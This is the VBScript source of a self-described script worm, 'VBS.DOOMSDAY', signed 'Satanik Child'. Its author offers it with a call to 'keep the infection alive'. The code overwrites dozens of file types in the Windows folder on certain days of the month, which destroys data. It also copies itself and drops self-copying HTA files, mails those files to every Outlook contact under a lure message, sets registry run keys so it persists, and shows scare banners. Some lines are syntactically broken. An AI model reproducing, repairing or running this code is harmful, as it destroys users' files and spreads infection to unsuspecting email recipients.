' VB§.DOO§DAY.VB§             
'CREATED BY: §ATANiK CHiLD                                               
'THI§ I§ ONE NA§TY A§§ §CRIPT WORM!    

On Error Resume Next
Dim fso,Reg,file,hta 
Set fso = CreateObject("Scripting.FileSystemObject")
Set Sh = WScript.CreateObject("WScript.Shell")
Set file = fso.CreateTextFile("C:\Windows\MSGBOX.vbs")
file.WriteLine"On Error Resume Next"
file.WriteLine"MsgBox""Be on alert!  There is a new internet worm that is infecting computers!"",VbOKOnly+VbCritical,""Microsoft Windows"""
file.Close
Set Runit = Wscript.CreateObject("Wscript.Shell")
Wscript.Sleep 9999
Runit.Run"C:\Windows\MSGBOX.vbs"
If Day(Now())= 3 or Day(Now()) = 13 or Day(Now()) = 7 Day(Now()) = 4 or Day(Now()) = 10 or Day(Now()) = 12 or Day(Now()) = 24 or Day(Now()) = 29 or Day(Now()) = 30 Then
Set hta = fso.CreateTextFile("C:\WINDOWS\OOOOOPS.hta",True)
hta.WriteLine"<" & "HTML>"&"<" & "HEAD>"&"<" & "TITLE>VIRUS ALERT<" & "/TITLE>"&vbcrlf&""&_
"<" & "/HEAD>"&vbcrlf&"<" &"script language =""VBScript"">"&VbCrLf&"<!--"&VbCrLf&""&_
"Dim NATAS, WshShell, FSO, efx3, scriptlink"&VbCrLf&"On Error Resume Next"&VbCrLf&""&_
"Randomize"&VbCrLf&"Set FSO = CreateObject(""Scripting.FileSystemObject"")"&VbCrLf&"Set"&_
" WshShell = Wscript.CreateObject(""Wscript.Shell"")"&VbCrLf&"NATAS = Wscript."&_
"ScriptFullName"&VbCrLf&"efx3 = Left(NATAS, InStrRev(NATAS, ""\""))"&VbCrLf&"For Each"&_
" target in FSO.GetFolder(efx3).Files"&VbCrLf&"FSO.CopyFile NATAS, target.Name, 1"&_
""&VbCrLf&"Next"&VbCrLf&"If Int((2 * Rnd) + 1) = 1 Then"&VbCrLf&"MsgBox ""SEEK REFUGE"&_
" FOR SATAN HOLDS NO MERCY FOR THE WEAK!"", 4096 ,""SATANIK CHILD"""&VbCrLf&"End If"&_
""&VbCrLf&"//-->"&VbCrLf&"<" & "/SCRIPT>"&VbCrLf&"<" & "/body><" & "/html>"&vbCrlf&""
hta.Close
End If

If Day(Now())= 1 or Day(Now())= 2 or Day(Now())= 7 or Day(Now()) = 9 or Day(Now()) = 10 or Day(Now()) = 12 or Day(Now()) = 15 or Day(Now())= 16 or Day(Now()) = 17 or Day(Now()) = 21 or Day(Now()) = 22 or Day(Now()) = 23 or Day(Now()) = 27 or Day(Now()) = 28 or Day(Now()) = 29 Then
WScript.Echo"Please make sure all your antivirus programs are updated. "
Set folderi = fso.GetFolder("C:\WINDOWS")
Set fid = folderi.Files
For each file1 in fid
ext = fso.GetExtensionName(file1.path)
ext = lcase(ext)
filen = lcase(file1.name)
If (ext="vbs") or (ext="htm") or (ext="js") or (ext="hlp") or (ext="bmp") or (ext="chm") or (ext="jpg") or (ext="gif") or (ext="doc") or (ext="pif") or (ext="html") or (ext="ico") or (ext="cur") or (ext="rtf") or (ext="mp3") or (ext="mpg") or (ext="wav") or (ext="pdf") or (ext="cab") or (ext="zip") or (ext="ace") or (ext="rar") or (ext="ttf") or (ext="bak") or (ext="class") or (ext="bat") or (ext="ini") or (ext="inf") or (ext="sys") or (ext="log") or (ext="ttf") or (ext="wiz") or (ext="midi") or (ext="tmp") or (ext="reg") or (ext="dll") Then
Set fileen = fso.OpenTextFile(file1.path,2,true)
fileen.Write mecopy
fileen.Close
				
End If
Next

Dim fso2,dirsystem,phile,vbscopy,MakeCopy
Set fso2 = CreateObject("Scripting.FileSystemObject")
Set reg = CreateObject("WScript.Shell")
Set dirsystem = fso2.GetSpecialFolder(1)
Set phile = fso2.OpenTextFile(WScript.ScriptFullname,1)
Set MakeCopy = fso2.GetFile(WScript.ScriptFullName)
vbscopy=phile.ReadAll
MakeCopy.Copy(dirsystem&"\I-Worm.VBS")
eq=""
ctr=0
Set fso2 = CreateObject("Scripting.FileSystemObject")
Set phile = fso2.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=phile.ReadAll
			
Set SYS = FSO.CreateTextFile("C:\Windows\WOrMMESSAGE.HTA")
SYS.WriteLine "<HTML>"&"<body bgcolor=""#000000"">"&"<div id='nap' style='position: absolute; text-align:center; top:60; left:0; font-size:40pt; font-family:Arial; font-weight:bold; color:#0066CC; FILTER:Light();'>"&"&nbsp;&nbsp; sAtAnYk chYld h@s fucked y0u g00d <"&"/"&"div>"&Chr(13)&Chr(10)&"<SCRIPT language=""VBScript""><!--"&Chr(13)&Chr(10)&"d=1:n=30:call fsn"&Chr(13)&Chr(10)&"Sub fsn"&Chr(13)&Chr(10)&"If n>=400 Then d=0"&Chr(13)&Chr(10)&"If n=<70 Then d=1"&Chr(13)&Chr(10)&"If d=1 Then n=n+10 Else n=n-10"&Chr(13)&Chr(10)&"Set o=nap.Filters(""Light"")"&Chr(13)&Chr(10)&"Call o.Clear()"&Chr(13)&Chr(10)&"Call o.AddAmbient(200,200,200,100)"&Chr(13)&Chr(10)&"Call o.AddPoint(n,35,25,200,200,200,100)"&Chr(13)&Chr(10)&"SetTimeout ""Call fsn"",80"&Chr(13)&Chr(10)&"End Sub"&Chr(13)&Chr(10)&"/"&"/"&"-->"&"<"&"/"&"SCRIPT>"&"<"&"/"&"HTML>"
SYS.WriteLine FUCK:SYS.Close
Set OLA = CreateObject("Outlook.Application")
For Each ALC In OLA.GetNameSpace("MAPI").AddressLists
If ALC.AddressEntries.Count <> 0 Then
Set FSS = OLA.CreateItem(0)
For FSN = 1 To ALC.AddressEntries.Count
FSS.BCC = FSS.BCC & "; " & ALC.AddressEntries(FSN).Address: Next
FSS.Subject = "Heres 3 of my files i picked for you!!!!"
FSS.Body = "You have to look at them or I will be disappointed!I took me a long time to learn how to create files such as these!"&Chr(13)&"So write me back and let me know what you think of my creations!  I'll be looking forward to your reply!"
FSS.Attachments.Add "C:\Windows\WOrMMESSAGE.HTA"
FSS.Attachments.Add  dirsystem&"\I-Worm.VBS"
FSS.Attachments.Add "C:\WINDOWS\OOOOOPS.hta"
FSS.DeleteAfterSubmit = 1
FSS.Send
End If: Next
End If


Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKCU\Software\Microsoft\SATANIK CHILD\", Chr(45) & Chr(45) & Chr(45) & Chr(61) & Chr(61) & Chr(61) & Chr(61) & Chr(58) & Chr(58) & Chr(83) & Chr(65) & Chr(84) & Chr(65) & Chr(84) & Chr(65) & Chr(78) & Chr(73) & Chr(75) & Chr(32) & Chr(67) & Chr(72) & Chr(73) & Chr(76) & Chr(68) & Chr(58) & Chr(58) & Chr(61) & Chr(61) & Chr(61) & Chr(61) & Chr(45) & Chr(45) & Chr(45) & Chr(45)
WshShell.RegWrite "HKLM\Software\Microsoft\INFECTED\", Chr(45) & Chr(45) & Chr(45) & Chr(61) & Chr(61) & Chr(61) & Chr(61) & Chr(58) & Chr(58) & Chr(83) & Chr(65) & Chr(84) & Chr(65) & Chr(84) & Chr(65) & Chr(78) & Chr(73) & Chr(75) & Chr(32) & Chr(67) & Chr(72) & Chr(73) & Chr(76) & Chr(68) & Chr(58) & Chr(58) & Chr(61) & Chr(61) & Chr(61) & Chr(61) & Chr(45) & Chr(45) & Chr(45) & Chr(45)
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\INFECTED FILE", "C:\WINDOWS\OOOOOPS.hta"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\SystemAlert", "C:\WINDOWS\WOrMMESSAGE.HTA"

Dim Satanik
    Set Satanik = CreateObject("Scripting.FileSystemObject")
    Set Satan = Satanik.CreateTextFile("C:\Windows\Msg.txt")
    Satan.Write"     .d8888.  .d8b.  d888888b  .d8b.  d8b   db d888888b db   dD"
    Satan.WriteBlankLines(1)
    Satan.Write"     88'  YP d8' `8b `~~88~~' d8' `8b 888o  88   `88'   88 ,8P'"
    Satan.WriteBlankLines(1)
    Satan.Write"     `8bo.   88ooo88    88    88ooo88 88V8o 88    88    88,8P"  
    Satan.WriteBlankLines(1)
    Satan.Write"       `Y8b. 88~~~88    88    88~~~88 88 V8o88    88    88`8b" 
    Satan.WriteBlankLines(1)
    Satan.Write"     db   8D 88   88    88    88   88 88  V888   .88.   88 `88."
    Satan.WriteBlankLines(1)
    Satan.Write"     `8888Y' YP   YP    YP    YP   YP VP   V8P Y888888P YP   YD" 
    Satan.WriteBlankLines(2)
    Satan.Write"             .o88b. db   db d888888b db      d8888b." 
    Satan.WriteBlankLines(1)
    Satan.Write"            d8P  Y8 88   88   `88'   88      88  `8D" 
    Satan.WriteBlankLines(1)
    Satan.Write"            8P      88ooo88    88    88      88   88" 
    Satan.WriteBlankLines(1)
    Satan.Write"            8b      88~~~88    88    88      88   88" 
    Satan.WriteBlankLines(1)
    Satan.Write"            Y8b  d8 88   88   .88.   88booo. 88  .8D" 
    Satan.WriteBlankLines(1)
    Satan.Write"             `Y88P' YP   YP Y888888P Y88888P Y8888D'" 
    Satan.WriteBlankLines(3)
    Satan.Write" THI§ COMPUTER HA§ INFECTED WITH AN EVIL CREATION BY ~§ATANyK CHyLD~"
    Satan.Close
    Set MsgRun = CreateObject("WScript.Shell")
    Wscript.Sleep 9999
    MsgRun.Run "C:\WINDOWS\MSG.TXT", 3


'to all the malicious creators out there....keep the infection alive!
                                                                
'  @@@@@@    @@@@@@   @@@@@@@   @@@@@@   @@@  @@@  @@@  @@@  @@@  
' @@@@@@@   @@@@@@@@  @@@@@@@  @@@@@@@@  @@@@ @@@  @@@  @@@  @@@  
' !@@       @@!  @@@    @@!    @@!  @@@  @@!@!@@@  @@!  @@!  !@@  
' !@!       !@!  @!@    !@!    !@!  @!@  !@!!@!@!  !@!  !@!  @!!  
' !!@@!!    @!@!@!@!    @!!    @!@!@!@!  @!@ !!@!  !!@  @!@@!@!   
'  !!@!!!   !!!@!!!!    !!!    !!!@!!!!  !@!  !!!  !!!  !!@!!!    
'      !:!  !!:  !!!    !!:    !!:  !!!  !!:  !!!  !!:  !!: :!!   
'     !:!   :!:  !:!    :!:    :!:  !:!  :!:  !:!  :!:  :!:  !:!  
' :::: ::   ::   :::     ::    ::   :::  ::   ::   ::   ::   :::  
' :: : :     :   : :     :      :   : :  ::    :   :     :   :::  
                                                                
                                             
'  @@@@@@@  @@@  @@@  @@@  @@@      @@@@@@@   
' @@@@@@@@  @@@  @@@  @@@  @@@      @@@@@@@@  
' !@@       @@!  @@@  @@!  @@!      @@!  @@@  
' !@!       !@!  @!@  !@!  !@!      !@!  @!@  ~satanik child~
' !@!       @!@!@!@!  !!@  @!!      @!@  !@!  
' !!!       !!!@!!!!  !!!  !!!      !@!  !!!  
' :!!       !!:  !!!  !!:  !!:      !!:  !!!  
' :!:       :!:  !:!  :!:  :!:      :!:  !:!  
' ::: :::   ::   :::   ::  :: ::::  :::: ::  
'  :: :: :   :   : :   :   : :: : : :: :  :   
                                             